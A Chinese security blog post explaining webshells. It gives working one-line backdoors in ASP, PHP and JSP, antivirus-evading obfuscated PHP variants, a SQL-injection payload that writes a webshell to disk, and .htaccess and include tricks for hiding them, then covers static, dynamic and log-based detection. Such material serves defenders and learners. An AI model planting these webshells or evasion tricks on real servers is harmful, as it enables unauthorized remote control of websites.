webshell分析与查杀

什么是webshell

 

webshell,简称网页后门。简单来说它是运行在web应用之上的远程控制程序。

webshell其实就是一张网页,由PHP、JSP、ASP、ASP.NET等这类web应用程序语言开发,但webshell并不具备常见网页的功能。例如登录、注册、信息展示等功能,一般会具备文件管理、端口扫描、提权、获取系统信息等功能。拥有较完整功能的webshell,我们一般称为大马。功能简易的webshell称为小马。除此之外还存在一句话木马、菜刀马、脱库马等等的名词,是对于webshell功能或者特性的简称。

webshell之PHP一句话木马解读

 

 

 

 ASP:

<%eval request("x")%>

ASP.NET:

<%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%>

PHP:

<?php @eval($_POST["x"]);?>

JSP:

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

webshell管理工具

中国蚁剑是一款开源的跨平台网站管理工具,也是一款webshell管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。中国蚁剑的核心代码模板均改自伟大的中国菜刀。

webshell分类

小马:执行功能时,需要将所有代码传递到服务端,功能封装在客户端。

大马:自身中封装了许多功能,只需要传递参数,即可执行对应的功能,例如端口扫描、反弹shell。

webshell变形免杀

变形

<?php
    $x=$_GET['x'];@eval("$x;");
?>

 

<?php
    $_GET['a']($_GET['b']);
?>
<?php
    $a="ass"."ert";$a(${"_PO"."ST"}['x']);
?>

 

如何获取webshell

利用网站的文件操作漏洞将webshell写入网站目录中

SQL注入

利用条件:

当前mysql用户拥有FILE权限

网站未对单引号进行转义

payload:
select `<?php eval($_POST['test'])?>` into outfile '/var/www/test.php';

上传漏洞

利用条件:

文件上传操作如头像、评论等,对用户上传文件过滤不严格,上传机制可被绕过,导致脚本文件的上传

任意代码执行

利用条件

用户传入参数被服务器脚本以源码方式执行

可直接插入恶意代码或利用脚本对应的文件写入操作写入webshell

任意文件包含漏洞

利用条件

网站动态包含配置文件

包含图片、日志文件等执行恶意代码

后台功能

利用条件

获取并进入网站后台管理界面,具有对网站文件写入与修改、数据库或文件备份、文件上传等权限

webshell的隐藏

文件包含

服务器内某访问量小、对网站影响小脚本文件中加入include(‘/upload/xx.jpg’);包含所上传的webshell文件

命名:命名、存放位置具有诱惑性 : /admin/help.php

改变编码格式

<?php@$_++;$__=(“#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);?>
#利用异或运算:<?php @$_POST[0]($_POST[1])?> xxx=eval($_POST[1]);

callback函数

<?php
function funfunc($str){}
echo preg_replace("/<title>(.+?)<\/title>/ies",'funfunc("\1")',
$_POST["cmd"]);
?>

cmd=<title>{${phpinfo()}}</tile>

修改已有脚本代码

在网站访问量小、不影响网站功能的脚本文件中加入一句话木马等

.htaccess文件

当服务器开启.htaccess文件解析可在upload文件夹内创建.htaccess文件写入下面内容

AddType application/x-httpd-php .jpg
<Files demo.jpg>
ForceType application/x-httpd-php
SetHandler application/x-httpd-php
</Files>

 

webshell的检测

webshell运行流程

hacker -> HTTP Protocol -> Web Server -> CGI
webshell为一个合法的http连接,在TCP/IP的应用层之下没有任何特征(谁知道呢)只能进行应用层检测

检测方式

静态检测

匹配文件特征码、特征值、危险函数eval等来查找webshell,依据特征码弱强特征,结合人工判断,可减少漏报误报概率,利用文件系统的属性判断,无缘无故多出的nobody属性文件必定有问题(Apache是nobody启动)

弱点: 漏报误报率较高,无法查杀变种及0day型

动态监测

依据webshell文件执行表现的特征即动态特征,如菜刀操作的特征,webshell命令执行时必会创建bash或IIS User启动cmd 由PID进程号定位webshell,http异常模型检测,检测若有有用户访问一个从未访问过的文件并得到200响应,很容易定位

webshell,修改内核,hook一些危险函数eval、asset,重新编译php;

弱点:降低php性能及业务性能

日志检测

webshell访问特征
- 少量ip发起fangwen
- 总访问次数少
- 该页面属于孤立页面

 

干扰数据:

管理后台等正常孤立页面
扫描器行为

 

posted @ 2021-10-20 20:35  学安全的小白  阅读(1683)  评论(0编辑  收藏  举报